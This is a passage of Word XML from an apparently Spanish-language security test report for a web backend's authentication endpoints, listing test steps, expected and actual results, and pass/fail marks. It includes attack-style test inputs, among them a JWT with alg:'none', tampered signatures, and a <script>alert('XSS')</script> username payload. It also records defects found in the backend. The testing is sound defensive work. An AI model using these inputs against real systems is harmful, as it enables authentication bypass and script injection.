                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-04 — Token JWT con firma manipulada es rechazado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
GET /profile</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Backend corriendo.
JWT válido generado.</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1. GET /profile con JWT válido (control).
2. Verificar acceso.</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HTTP 200.</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HTTP 200.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
GET /profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT válido disponible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Reemplazar últimos 5 chars de la firma con "XXXXX".
2. GET /profile con token alterado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 401.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 401. {"error":"Unauthorized"}.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
GET /profile</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JWT válido disponible.</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1. Modificar payload del JWT (userId distinto).
2. Mantener firma original.
3. GET /profile.</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HTTP 401 (firma no coincide con payload).</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HTTP 401.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
GET /profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend corriendo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Construir JWT con alg:"none" y firma vacía.
2. GET /profile con ese token.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 401 (algoritmo none rechazado).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 401.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
GET /profile</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Backend corriendo.</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1. GET /profile con header Authorization: Bearer (vacío).</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HTTP 401.</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HTTP 401.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
GET /profile
[DEF POTENCIAL]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT válido disponible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Enviar JWT válido SIN prefijo "Bearer " en Authorization.
2. Verificar si el middleware lo rechaza.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 401 (formato incorrecto).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200. Middleware acepta token sin prefijo Bearer (usa replace en lugar de split). Token válido aceptado sin validar formato.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-05 — Política de contraseñas débiles [DEF-SEC-02]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/register
[DEF-SEC-02]</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Backend corriendo.</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1. POST /auth/register con contraseña "123" (3 chars).
2. Verificar rechazo.</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HTTP 400. Error indicando requisito de contraseña.</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HTTP 201. Contraseña débil aceptada. Sin validación de política.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/register
[DEF-SEC-02]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend corriendo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Probar contraseñas: "password", "12345678", "", "        ", "abcdefgh".
2. Verificar rechazo en cada una.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 400 en todos los casos con mensaje de error.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 201 en todos los casos. Las 5 contraseñas débiles son aceptadas sin restricción.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/register</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Backend corriendo.</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1. POST con contraseña fuerte "StrongPass123!" (≥8 chars, mayúscula, símbolo).
2. Verificar aceptación.</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HTTP 201.</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HTTP 201. {"message":"User registered successfully"}.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-06 — XSS: inyección de script en campos de texto [DEF-SEC-03]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/register
[DEF-SEC-03]</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Backend corriendo.</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1. Registrar con username: "&lt;script&gt;alert(\"XSS\")&lt;/script&gt;".
2. Verificar si se almacena sin sanitizar.</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HTTP 400 o username sanitizado (sin etiqueta script en BD).</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HTTP 201. Username almacenado como "&lt;script&gt;alert(\"XSS\")&lt;/script&gt;" en MongoDB. Sin sanitización.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
